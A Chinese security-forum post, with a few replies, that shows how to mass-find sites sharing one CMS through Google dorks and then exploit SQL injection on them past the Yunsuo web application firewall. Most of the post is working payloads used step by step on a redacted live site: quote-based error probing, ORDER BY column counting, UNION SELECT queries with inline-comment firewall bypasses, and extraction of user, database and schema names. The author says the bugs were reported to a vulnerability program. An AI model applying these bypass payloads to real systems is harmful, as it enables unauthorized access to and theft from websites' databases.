用户
搜索
  • TA的每日心情
    开心
    2020-9-5 15:04
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋-脚本小子

    Rank: 2

    2

    主题

    18

    帖子

    176

    魔法币
    收听
    0
    粉丝
    1
    注册时间
    2020-9-5
    发表于 2020-10-14 16:54:33 45202

    [TOC]

    自我介绍:

    大家好,我是鬼碟丶,这是我来到i春秋写的第五篇原创文章。

    我写文章向来是尽可能的把各种思路写在一起,而不是分散着些,所以我在网上收集了个人认为不错的思路以及自己在挖掘过程中的思路,然后融入到本文章当中,争取让大家能够学到这方面更多的知识和思路。

    我写文章就是带着耳机,循环放着自己喜欢的歌单,翻阅各种历史文章,然后一边写一边思考,写完了然后总体检阅一遍。在我想构思第四篇应该写什么的时候,其实我很久以前就想过了,只不过我把它放在了我的第四篇文章当中,所以,本文章思路很多,当然我也会找相关的思路例子以更好地助于吸收学习,有些例子找不到那么我尽可能的用文字来描述的详细一些。

    QQ:914659453,希望能与更多志同道合的朋友一起交流学习。

    本篇分享大纲:

    1. 谷歌访问助手解疑
    2. 分享谷歌找通杀技巧。
    3. Bypass云锁最简单的技巧。

    一、首先介绍一下今天的漏洞:

    今天要说的通杀漏洞主要是SQL注入,其次是遇到WAF以后,如何Bypass。

    SQL注入的原理必须要熟记于心:

    1. 用户能够控制输入数据 。
    2. 能够将用户输入的数据拼接进去执行。

    二、谷歌访问助手:

    如果谷歌访问助手安装失败,尝试将.crx改为.zip,然后再将插件拖进浏览器。

    三:谷歌语法:

    和上篇文章一样需要通杀的思路,在这里再科普一下谷歌语法。

    这里是本次用到的:

    site:指定域名,例:site:edu.cn 列出所有域名带有edu.cn的网站
    inurl:指定url/目录/脚本语言,例:inurl:login.php 列出所有url中带有login.php的网站
    intitle:指定网站标题,title部分,例:intitle:后台管理 列出标题为后台管理的网站
    intext:把网页中的正文内容中的某个字符做为搜索条件(但是只能搜索冒号后接的一个关键字)
    双引号":强制搜索被双引号引用的内容

    谷歌语法参考链接:

    https://blog.csdn.net/u013589137/article/details/82758762

    http://blog.sina.com.cn/s/blog_b4cbba7e0102x567.html

    更多语法就不在这里讲解了,大家有兴趣可以继续去寻找。

    四:通杀挖掘:

    事先声明,本篇文章所涉及到的漏洞均已提交SRC平台。希望小伙伴们可以发挥自己的思路,本文章只是给你们提供思路,具体情况自己发挥。

    这里要先说一下,自己通过谷歌语法找一个拥有技术支持的站,然后再通过谷歌语法和FOFA寻找通杀。今天分享是也是我之前挖到的,直接上谷歌语法了。

    谷歌语法:inurl:php "xxxx"

    这里找到的都是同一家技术支持,同样的cms。有什么不懂的地方,可以去看一下上篇文章。

    五:Bypass云锁:

    上面找到同一家公司的时候,进去发现有的网站装有云锁,还好刚刚学会绕云锁。

    方法比较简单,大佬勿喷。

    这里先说一下payload:

    /*!60000sad*/  WAF过滤哪些关键词就写在哪些中间,例如:order/*!60000*/by 1 或 系统函数:user/*!60000asd*/() 或 database/*!60000asd*/(),等
    
    /**/          用于绕过系统函数的括号

    这里再解释一下payload:

    /*!*/   属于内联注释  
    60000   属于数据库版本号,为5位数,可换成其他5位数号码(只要能Bypass)
    asd     属于填充代码,必须有,但是随便输
    /**/    属于注释,可以暂时理解为这里面输入的数据相当于空,如:database/*as*/() ==>database()

    从上面找的站中,随便跳出来一个,当做案例讲解吧。

    看到这里想都不想就会开始注入对吧。

    加一个单引号      http://xxxxxxxx.com/xx/article.php?id=48'

    添加单引号报错,确认存在注入。既然确定有注入,下面就是该猜字段咯。

    order by 1

    云锁出来了,下面用我们之前的payload绕过。

    order/*!66666asd*/by 1

    绕过去了,试了一下,一共有15个字段,知道了字段数,就该判断显错位了。

    union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 limit 1,1

    正常写联合查询语句,被云锁给锁头了。

    union/*!66666asd*/select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 limit 1,1

    显错位已经出来了,下面让他出数据。这里先讲一下系统函数:

    version()               mysql 数据库版本
    database()              当前数据库名
    user()                  用户名
    current_user()          当前用户名
    system_user()           系统用户名
    @@datadir               数据库路径
    @@version_compile_os    操作系统版本

    可能有所不全,大家可以自己去谷歌搜索补充。

    我们做SQL注入,最关注的就是权限的问题对吧,下面让他先出当前用户名和数据库名吧。

    union select 1,2,3,current_user(),5,6,database(),8,9,10,11,12,13,14,15 limit 1,1

    正常语句,又被锁了,继续用之前的payload。

    union/*!66666asd*/select 1,2,3,current_user/**/(),5,6,database/**/(),8,9,10,11,12,13,14,15 limit 1,1

    这里还是被锁了,是什么原因呢?那肯定是()括号的原因了。

     union/*!66666asd*/select 1,2,3,current_user/**/(),5,6,database/**/(),8,9,10,11,12,13,14,15 limit 1,1

    这里用/**/来分割危险函数。

    不是root权限,没得兴趣了。

    下面注表名等等。

    过滤了group_concat(),限制了selectfrom的结合,from无法绕过,使用/*!00000select*/绕过。

    查库名:

    union/*!66666asd*//*!00000select*/ 1,2,3,schema_name,5,6,7,8,9,10,11,12,13,14,15 from information_schema.schemata limit 1,1

    由于最近没钱交房租和电费,emmmm,房东把WiFi停掉了,用我破手机开的热点勉强写完,最后一个图片网络太不稳定 了。没得图片了。下边的按部就班就可以了。

    发表于 2020-10-14 22:15:54
    不是root权限,大佬来点提权
    使用道具 举报 回复
    使用道具 举报 回复
    Pandame 发表于 2020-10-14 22:15
    不是root权限,大佬来点提权

    仅通过SQL注入来提权吗?弟弟不会
    使用道具 举报 回复
    感谢分享
    剑未佩妥出门已是江湖
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册